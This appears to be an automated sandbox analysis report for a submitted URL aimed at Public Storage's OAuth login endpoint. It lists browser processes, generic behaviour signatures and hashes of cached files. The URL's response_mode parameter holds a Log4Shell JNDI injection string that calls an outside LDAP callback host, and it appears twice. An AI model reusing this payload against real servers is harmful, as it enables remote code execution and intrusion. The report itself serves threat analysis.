Analysis

  • max time kernel
    147s
  • max time network
    155s
  • platform
    windows7_x64
  • resource
    win7-20220901-en
  • resource tags
    arch:x64, arch:x86, image:win7-20220901-en, locale:en-us, os:windows7-x64, system
  • submitted
    29/10/2022, 01:08

General

  • Target

    http://PUBLICSTORAGE.COM/myaccount/identity/connect/authorize?client_id=ps.website.external.client.local&redirect_uri=https://www.publicstorage.com&response_mode=${jndi:ldap://514cz0sjptvokcxl4ypzyzly3p9fx4.oastify.com/a}&response_type=id_tokentoken&scope=openidprofileps.website.resource.default&state=openidconnect.authenticationproperties=vhz6lk1nukbhq67qltln6jvl7-qwiz3ellvvk61brr5_kcv_irm3jajyg0qygq_ar6biqd8d-q7unsrakiousyulb6aykuc4achyyibqq9hqrxhkdnunc1thl5qku5wfyhfzofc9v32scloovp5v6vz04syge3wsezkvm3by2gahvgivzylt9qgh9srza6vg9yylg2dpqo1y_ydfcyy6q5q4pxpaoegbh2pk1mhaeehb6kby1kgwqvxiz0-ydayzmg4znbsmklaost1gt4fuopb3tmurfrq7yshvd0utxz-enlirljufbmx-csgwx4kky3z8hm_evsfwtzuxfqwmlq&nonce=638024130977957441.zmzkody2zgqty2u3yi00njrmlthjntutotizy2uzzdlhogniowu5owi3mtutotewzs00mdnjlweyzdctnduwyji0mjrlodu1&acr_values=employeeid:-15&x-client-sku=id_net&x-client-ver=1.0.40306.15

Score
1/10

Malware Config

Signatures

  • Modifies Internet Explorer settings 1 TTPs 38 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files\Internet Explorer\iexplore.exe
    "C:\Program Files\Internet Explorer\iexplore.exe" http://PUBLICSTORAGE.COM/myaccount/identity/connect/authorize?client_id=ps.website.external.client.local&redirect_uri=https://www.publicstorage.com&response_mode=${jndi:ldap://514cz0sjptvokcxl4ypzyzly3p9fx4.oastify.com/a}&response_type=id_tokentoken&scope=openidprofileps.website.resource.default&state=openidconnect.authenticationproperties=vhz6lk1nukbhq67qltln6jvl7-qwiz3ellvvk61brr5_kcv_irm3jajyg0qygq_ar6biqd8d-q7unsrakiousyulb6aykuc4achyyibqq9hqrxhkdnunc1thl5qku5wfyhfzofc9v32scloovp5v6vz04syge3wsezkvm3by2gahvgivzylt9qgh9srza6vg9yylg2dpqo1y_ydfcyy6q5q4pxpaoegbh2pk1mhaeehb6kby1kgwqvxiz0-ydayzmg4znbsmklaost1gt4fuopb3tmurfrq7yshvd0utxz-enlirljufbmx-csgwx4kky3z8hm_evsfwtzuxfqwmlq&nonce=638024130977957441.zmzkody2zgqty2u3yi00njrmlthjntutotizy2uzzdlhogniowu5owi3mtutotewzs00mdnjlweyzdctnduwyji0mjrlodu1&acr_values=employeeid:-15&x-client-sku=id_net&x-client-ver=1.0.40306.15
    1⤵
    • Modifies Internet Explorer settings
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1104
    • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1104 CREDAT:275457 /prefetch:2
      2⤵
      • Modifies Internet Explorer settings
      • Suspicious use of SetWindowsHookEx
      PID:856

Network

MITRE ATT&CK Enterprise v6

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_1DC6D7385EA816C957BA2B715AC5C442
    Filesize: 1KB
    MD5: 89faa4131e0e314a2a8a17045cd6278b
    SHA1: 39b77d3ba6ec3b13695cbc7d544e7a7e20417057
    SHA256: 7c6a61dc49b002c0593f17459453dd793042601ae51905c85540ed6f3d5e75ee
    SHA512: 310e433e2d3406e919b6884f695c90a121234d76b275efa3d5f7c9f42e5ea53fb7b88eff0f10df4bae43f2a41f9f76213b8448761c92e6e50ed2567ea5e14488

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_1DC6D7385EA816C957BA2B715AC5C442
    Filesize: 446B
    MD5: 99ddb4271347f83fa0434b12580d91a8
    SHA1: 5e2db41075677061f1c0f1776ad27b3de76ef2cb
    SHA256: dccf364bfa3daac6031dc928a8221f31dc77e7c4537e853bc6e4975d555c2d4c
    SHA512: 2f4a591a7dfcd77a82877e2fda17aef0f3b0ef0faf88a4dd16b80d91cf91b8ab9a80a532973d5414d672330812c3d6eeece4f1ebb9f504b3c6ff93c023a73a8a

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize: 344B
    MD5: 1ee6d646e028998731f17e37b6109942
    SHA1: 6bb4a9bde8cc14d39b17c9b86eee477d121e65f6
    SHA256: 7fc140455ea9a3323d381219f6fe0b2906a910887a239d531c257332ca15575f
    SHA512: 034fd47496144f6dea7d422af3d97d1434092c2ffe62813c1963e59aa8c746a40d2f5a559cf52745397e820442177c37bcdc989624abd2c3c4d496fef86d9101

  • C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\imagestore\309axvf\imagestore.dat
    Filesize: 8KB
    MD5: c212b34972cffea14dd0ebfccc438748
    SHA1: 7ae4523aa9ffe2dc274b4f55f86abd4355b78604
    SHA256: d9a9a27342f74575f18e47a8d0b7e19449cfddbce417cfacef041415820f7c4d
    SHA512: b4cb0d871892d4b59ea7434fe68008fb9797ee4299c683536d734dae0f38df10cac5905abd9253ddfc84f7527b2c0c1e10b71bb94ca46b95ee4d66d34a15772a

  • C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\imagestore\309axvf\imagestore.dat
    Filesize: 12KB
    MD5: f2231980c347161044a367feceef76a2
    SHA1: fab70acbcccb3c0eb36ed166ec4b2a4078cecbd8
    SHA256: 74aea6bfa275dcc79ee4bed5ac99a629f04de31f245ed8f6721059db6a82c47b
    SHA512: 1a020b9b53941d59362e48f68f25e00066911b70f93b102b9881795a17ceeee4e1b71ea21d251f179a04cec08aeb37860c4fa9d50c560762d04ed2354ccad693

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\45FW34N6.txt
    Filesize: 603B
    MD5: 64bcfa2d8a8f62894ca99e8ebe06c093
    SHA1: 976b589cbb1d93ec7880cd27a58bd6db76e40a9c
    SHA256: 76ec17032500a88239e91f9ae2094d0ca1cf147c149b0265b9ee902ec5eb6e96
    SHA512: 0a2d1f1e3a03147afd550837450a4407d735371b74dfbd4d9fba5a80aaac3ad6151b10a83bc4b380d71a6e2e2ea0a9a661589ab714537caad4a203a43806c37c